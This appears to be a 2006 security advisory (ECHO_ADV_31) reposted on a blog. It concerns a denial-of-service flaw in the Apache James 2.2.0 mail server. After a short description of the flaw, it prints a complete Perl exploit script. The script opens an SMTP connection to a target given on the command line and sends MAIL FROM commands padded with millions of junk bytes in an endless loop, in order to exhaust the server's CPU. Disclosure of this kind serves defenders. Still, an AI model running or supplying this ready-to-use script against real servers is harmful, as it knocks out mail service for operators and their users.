Friday, May 26, 2006

echo_adv_31$2006

---------------------------------------------------------------------------
[ECHO_ADV_31$2006] JAMES 2.2.0 <-- Denial Of Service

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Java Apache Mail Enterprise Server (a.k.a. Apache James)
version : 2.2.0
URL : http://jakarta.apache.org/avalon/phoenix
Description :

The Java Apache Mail Enterprise Server (a.k.a. Apache James) is
a 100% pure Java SMTP and POP3 Mail server and NNTP News server.
James also designed to be a complete and portable enterprise mail
engine solution based on currently available open protocols.

James is based upon the Apache Avalon application framework.
(For more information about Avalon, please go to http://avalon.apache.org/)

James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3).

----------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

James SMTP servers are allowing attacker to supply a long variable at
SMTP argument (such as MAIL) to the SMTP server, because of this
vulnerability the Processor at server machine will have a workload till 100%


Exploit Code:
~~~~~~~~~~~~~

-------------------------- james.pl-----------------------------------------

#!/usr/bin/perl -w

use IO::Socket;

print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

if(@ARGV == 1)

{

my $host = $ARGV[0];
my $i = 1;

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)
or die " Cannot Connect to Server !";

while ( $i++ ) {
print $socket "MAIL FROM:" . "fvckz" x 1000000 . "\r\n" and
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
close $socket;

}
else
{ print " Usage: $0 [target] \r\n\n"; }

---------------------------------------------------------------------------

No comments:

Post a Comment